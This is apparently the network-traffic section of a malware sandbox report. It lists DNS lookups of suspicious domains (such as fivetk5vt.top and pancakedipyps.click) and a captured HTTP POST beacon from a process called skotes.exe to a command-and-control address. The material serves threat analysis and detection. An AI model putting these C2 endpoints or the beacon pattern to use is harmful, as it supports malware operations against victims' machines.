Dec 19, 2024 10:10:39.423886061 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.423938036 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.424844980 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.424932003 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.425003052 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.425898075 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.425981045 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:39.426018000 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:39.426048994 CET	49928	80	192.168.2.6	185.215.113.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 10:10:15.071738958 CET	192.168.2.6	1.1.1.1	0x74c8	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:15.717439890 CET	192.168.2.6	1.1.1.1	0x272e	Standard query (0)	grannyejh.lat	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:27.363784075 CET	192.168.2.6	1.1.1.1	0xf5a5	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:37.293662071 CET	192.168.2.6	1.1.1.1	0x7622	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:37.293925047 CET	192.168.2.6	1.1.1.1	0xe0ec	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 19, 2024 10:10:38.449139118 CET	192.168.2.6	1.1.1.1	0x925b	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:44.443164110 CET	192.168.2.6	1.1.1.1	0xe601	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:44.443293095 CET	192.168.2.6	1.1.1.1	0x7529	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 19, 2024 10:10:44.880477905 CET	192.168.2.6	1.1.1.1	0xc39	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:45.021543026 CET	192.168.2.6	1.1.1.1	0x2f6a	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:10:45.425558090 CET	192.168.2.6	1.1.1.1	0xc1ca	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:45.425713062 CET	192.168.2.6	1.1.1.1	0x9e3	Standard query (0)	play.google.com	65	IN (0x0001)	false
Dec 19, 2024 10:10:47.089186907 CET	192.168.2.6	1.1.1.1	0x8e7a	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:47.227061987 CET	192.168.2.6	1.1.1.1	0x7e93	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:47.379381895 CET	192.168.2.6	1.1.1.1	0x6200	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 19, 2024 10:10:47.818938017 CET	192.168.2.6	1.1.1.1	0xb671	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:47.958758116 CET	192.168.2.6	1.1.1.1	0xb420	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:48.103085041 CET	192.168.2.6	1.1.1.1	0xf11b	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:10:49.575686932 CET	192.168.2.6	1.1.1.1	0xaa48	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.576307058 CET	192.168.2.6	1.1.1.1	0x4fda	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.715014935 CET	192.168.2.6	1.1.1.1	0x70b2	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.715363026 CET	192.168.2.6	1.1.1.1	0xea5	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.718688965 CET	192.168.2.6	1.1.1.1	0x6f82	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.768377066 CET	192.168.2.6	1.1.1.1	0x724e	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.781097889 CET	192.168.2.6	1.1.1.1	0x7174	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.855854988 CET	192.168.2.6	1.1.1.1	0x1195	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 19, 2024 10:10:50.292598963 CET	192.168.2.6	1.1.1.1	0xd811	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:50.293384075 CET	192.168.2.6	1.1.1.1	0x7cae	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:50.431247950 CET	192.168.2.6	1.1.1.1	0x692b	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:10:50.431301117 CET	192.168.2.6	1.1.1.1	0x79d5	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:10:55.785171032 CET	192.168.2.6	1.1.1.1	0x2934	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:10.424546003 CET	192.168.2.6	1.1.1.1	0xbb44	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 19, 2024 10:11:10.445332050 CET	192.168.2.6	1.1.1.1	0x68e3	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:11:10.453404903 CET	192.168.2.6	1.1.1.1	0x6e2d	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:11:10.563972950 CET	192.168.2.6	1.1.1.1	0x1df1	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:11:26.142595053 CET	192.168.2.6	1.1.1.1	0xee0c	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:26.142644882 CET	192.168.2.6	1.1.1.1	0xe94b	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 19, 2024 10:11:29.947128057 CET	192.168.2.6	1.1.1.1	0xa511	Standard query (0)	home.fivetk5vt.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:29.947129011 CET	192.168.2.6	1.1.1.1	0xa2c4	Standard query (0)	home.fivetk5vt.top	28	IN (0x0001)	false
Dec 19, 2024 10:11:34.455126047 CET	192.168.2.6	1.1.1.1	0xb64f	Standard query (0)	home.fivetk5vt.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:34.455235004 CET	192.168.2.6	1.1.1.1	0x2178	Standard query (0)	home.fivetk5vt.top	28	IN (0x0001)	false
Dec 19, 2024 10:11:38.346647978 CET	192.168.2.6	1.1.1.1	0xe7e5	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:11:38.524178028 CET	192.168.2.6	1.1.1.1	0xb352	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:38.621824026 CET	192.168.2.6	1.1.1.1	0x583	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 19, 2024 10:11:38.638473988 CET	192.168.2.6	1.1.1.1	0x5ac1	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:11:39.046016932 CET	192.168.2.6	1.1.1.1	0x8e60	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:39.184570074 CET	192.168.2.6	1.1.1.1	0x6e6	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:11:39.741566896 CET	192.168.2.6	1.1.1.1	0xcb2a	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:39.920872927 CET	192.168.2.6	1.1.1.1	0x2366	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:52.923263073 CET	192.168.2.6	1.1.1.1	0xfdfe	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:57.753468037 CET	192.168.2.6	1.1.1.1	0x9329	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:11:58.071830988 CET	192.168.2.6	1.1.1.1	0x757d	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:58.990097046 CET	192.168.2.6	1.1.1.1	0x8dfd	Standard query (0)	fivetk5vt.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:58.990292072 CET	192.168.2.6	1.1.1.1	0x870f	Standard query (0)	fivetk5vt.top	28	IN (0x0001)	false
Dec 19, 2024 10:11:59.574843884 CET	192.168.2.6	1.1.1.1	0x6913	Standard query (0)	pancakedipyps.click	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:59.825623989 CET	192.168.2.6	1.1.1.1	0x6913	Standard query (0)	pancakedipyps.click	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:01.893601894 CET	192.168.2.6	1.1.1.1	0x1362	Standard query (0)	fivetk5vt.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:01.893635988 CET	192.168.2.6	1.1.1.1	0x7de4	Standard query (0)	fivetk5vt.top	28	IN (0x0001)	false
Dec 19, 2024 10:12:05.885021925 CET	192.168.2.6	1.1.1.1	0xf135	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:05.885127068 CET	192.168.2.6	1.1.1.1	0x8ebb	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 19, 2024 10:12:07.753051996 CET	192.168.2.6	1.1.1.1	0x24f6	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:12:07.806153059 CET	192.168.2.6	1.1.1.1	0x1206	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:12:09.812344074 CET	192.168.2.6	1.1.1.1	0x288d	Standard query (0)	fivetk5vt.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:09.812453032 CET	192.168.2.6	1.1.1.1	0xf527	Standard query (0)	fivetk5vt.top	28	IN (0x0001)	false
Dec 19, 2024 10:12:12.701100111 CET	192.168.2.6	1.1.1.1	0x43b4	Standard query (0)	home.fivetk5vt.top	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:12.701231003 CET	192.168.2.6	1.1.1.1	0x25f0	Standard query (0)	home.fivetk5vt.top	28	IN (0x0001)	false
Dec 19, 2024 10:12:19.338148117 CET	192.168.2.6	1.1.1.1	0x3756	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:29.617496014 CET	192.168.2.6	1.1.1.1	0x65d0	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:45.496388912 CET	192.168.2.6	1.1.1.1	0xca7d	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:48.757642031 CET	192.168.2.6	1.1.1.1	0x1228	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:12:48.886209965 CET	192.168.2.6	1.1.1.1	0xa72c	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:48.944190025 CET	192.168.2.6	1.1.1.1	0x88a0	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 19, 2024 10:12:48.955554962 CET	192.168.2.6	1.1.1.1	0xeff	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:12:49.054295063 CET	192.168.2.6	1.1.1.1	0x5410	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:49.161912918 CET	192.168.2.6	1.1.1.1	0xf298	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:49.313025951 CET	192.168.2.6	1.1.1.1	0x1349	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 19, 2024 10:12:50.135143042 CET	192.168.2.6	1.1.1.1	0xea4a	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 10:10:15.496526957 CET	1.1.1.1	192.168.2.6	0x74c8	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:16.043195963 CET	1.1.1.1	192.168.2.6	0x272e	No error (0)	grannyejh.lat		172.67.179.109	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:16.043195963 CET	1.1.1.1	192.168.2.6	0x272e	No error (0)	grannyejh.lat		104.21.64.80	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:27.501857042 CET	1.1.1.1	192.168.2.6	0xf5a5	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:37.430751085 CET	1.1.1.1	192.168.2.6	0x7622	No error (0)	www.google.com		172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:37.431087017 CET	1.1.1.1	192.168.2.6	0xe0ec	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 19, 2024 10:10:38.586545944 CET	1.1.1.1	192.168.2.6	0x925b	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:44.582021952 CET	1.1.1.1	192.168.2.6	0xe601	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:10:44.582021952 CET	1.1.1.1	192.168.2.6	0xe601	No error (0)	plus.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:44.582803965 CET	1.1.1.1	192.168.2.6	0x7529	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:10:44.877419949 CET	1.1.1.1	192.168.2.6	0xcae7	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:45.020489931 CET	1.1.1.1	192.168.2.6	0xc39	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:45.563102961 CET	1.1.1.1	192.168.2.6	0xc1ca	No error (0)	play.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:47.225940943 CET	1.1.1.1	192.168.2.6	0x8e7a	No error (0)	youtube.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:47.364285946 CET	1.1.1.1	192.168.2.6	0x7e93	No error (0)	youtube.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:47.519606113 CET	1.1.1.1	192.168.2.6	0x6200	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 19, 2024 10:10:47.956336975 CET	1.1.1.1	192.168.2.6	0xb671	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:10:47.956336975 CET	1.1.1.1	192.168.2.6	0xb671	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:48.095762968 CET	1.1.1.1	192.168.2.6	0xb420	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:48.240747929 CET	1.1.1.1	192.168.2.6	0xf11b	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 19, 2024 10:10:49.713407993 CET	1.1.1.1	192.168.2.6	0xaa48	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.713424921 CET	1.1.1.1	192.168.2.6	0x4fda	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.851839066 CET	1.1.1.1	192.168.2.6	0x70b2	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.852561951 CET	1.1.1.1	192.168.2.6	0xea5	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.852561951 CET	1.1.1.1	192.168.2.6	0xea5	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.855330944 CET	1.1.1.1	192.168.2.6	0x6f82	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.905572891 CET	1.1.1.1	192.168.2.6	0x724e	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:10:49.905572891 CET	1.1.1.1	192.168.2.6	0x724e	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:49.917968035 CET	1.1.1.1	192.168.2.6	0x7174	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:10:49.917968035 CET	1.1.1.1	192.168.2.6	0x7174	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:50.015522003 CET	1.1.1.1	192.168.2.6	0xdc1e	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:10:50.015522003 CET	1.1.1.1	192.168.2.6	0xdc1e	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:50.430469036 CET	1.1.1.1	192.168.2.6	0xd811	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:10:50.430488110 CET	1.1.1.1	192.168.2.6	0x7cae	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:10.466423035 CET	1.1.1.1	192.168.2.6	0x6c64	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:10.972939014 CET	1.1.1.1	192.168.2.6	0xfb96	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:11:10.972939014 CET	1.1.1.1	192.168.2.6	0xfb96	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:26.452816963 CET	1.1.1.1	192.168.2.6	0xee0c	No error (0)	httpbin.org		34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:26.452816963 CET	1.1.1.1	192.168.2.6	0xee0c	No error (0)	httpbin.org		98.85.100.80	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:30.520277023 CET	1.1.1.1	192.168.2.6	0xa511	No error (0)	home.fivetk5vt.top		176.53.146.212	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:34.595124006 CET	1.1.1.1	192.168.2.6	0xb64f	No error (0)	home.fivetk5vt.top		176.53.146.212	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:38.664172888 CET	1.1.1.1	192.168.2.6	0xb352	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:11:38.664172888 CET	1.1.1.1	192.168.2.6	0xb352	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:39.022901058 CET	1.1.1.1	192.168.2.6	0x35c8	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:11:39.022901058 CET	1.1.1.1	192.168.2.6	0x35c8	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:39.048361063 CET	1.1.1.1	192.168.2.6	0x35c8	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:11:39.048361063 CET	1.1.1.1	192.168.2.6	0x35c8	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:39.183736086 CET	1.1.1.1	192.168.2.6	0x8e60	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:39.739578962 CET	1.1.1.1	192.168.2.6	0x2501	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:39.878674030 CET	1.1.1.1	192.168.2.6	0xcb2a	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:40.057832956 CET	1.1.1.1	192.168.2.6	0x2366	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:11:40.057832956 CET	1.1.1.1	192.168.2.6	0x2366	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:53.061732054 CET	1.1.1.1	192.168.2.6	0xfdfe	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:57.891259909 CET	1.1.1.1	192.168.2.6	0x9329	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 19, 2024 10:11:58.209858894 CET	1.1.1.1	192.168.2.6	0x757d	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:59.277250051 CET	1.1.1.1	192.168.2.6	0x8dfd	No error (0)	fivetk5vt.top		176.53.146.212	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:59.919277906 CET	1.1.1.1	192.168.2.6	0x6913	No error (0)	pancakedipyps.click		104.21.23.76	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:59.919277906 CET	1.1.1.1	192.168.2.6	0x6913	No error (0)	pancakedipyps.click		172.67.209.202	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:59.967797995 CET	1.1.1.1	192.168.2.6	0x6913	No error (0)	pancakedipyps.click		172.67.209.202	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:11:59.967797995 CET	1.1.1.1	192.168.2.6	0x6913	No error (0)	pancakedipyps.click		104.21.23.76	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:02.033216000 CET	1.1.1.1	192.168.2.6	0x1362	No error (0)	fivetk5vt.top		176.53.146.212	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:06.022042036 CET	1.1.1.1	192.168.2.6	0xf135	No error (0)	www.google.com		142.250.181.100	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:06.022079945 CET	1.1.1.1	192.168.2.6	0x8ebb	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 19, 2024 10:12:07.891088963 CET	1.1.1.1	192.168.2.6	0x176b	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:12:07.891088963 CET	1.1.1.1	192.168.2.6	0x176b	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:09.950288057 CET	1.1.1.1	192.168.2.6	0x288d	No error (0)	fivetk5vt.top		176.53.146.212	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:12.840311050 CET	1.1.1.1	192.168.2.6	0x43b4	No error (0)	home.fivetk5vt.top		176.53.146.212	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:19.477061033 CET	1.1.1.1	192.168.2.6	0x3756	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:12:19.477061033 CET	1.1.1.1	192.168.2.6	0x3756	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:29.759624004 CET	1.1.1.1	192.168.2.6	0x65d0	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:45.637043953 CET	1.1.1.1	192.168.2.6	0xca7d	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:49.024027109 CET	1.1.1.1	192.168.2.6	0xa72c	No error (0)	youtube.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:49.141298056 CET	1.1.1.1	192.168.2.6	0xc59c	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:12:49.141298056 CET	1.1.1.1	192.168.2.6	0xc59c	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:49.193583965 CET	1.1.1.1	192.168.2.6	0x5410	No error (0)	youtube.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:49.301053047 CET	1.1.1.1	192.168.2.6	0xf298	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 19, 2024 10:12:50.273894072 CET	1.1.1.1	192.168.2.6	0xea4a	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 10:12:50.273894072 CET	1.1.1.1	192.168.2.6	0xea4a	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49846	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:10:04.708255053 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 19, 2024 10:10:06.054050922 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:10:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49856	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
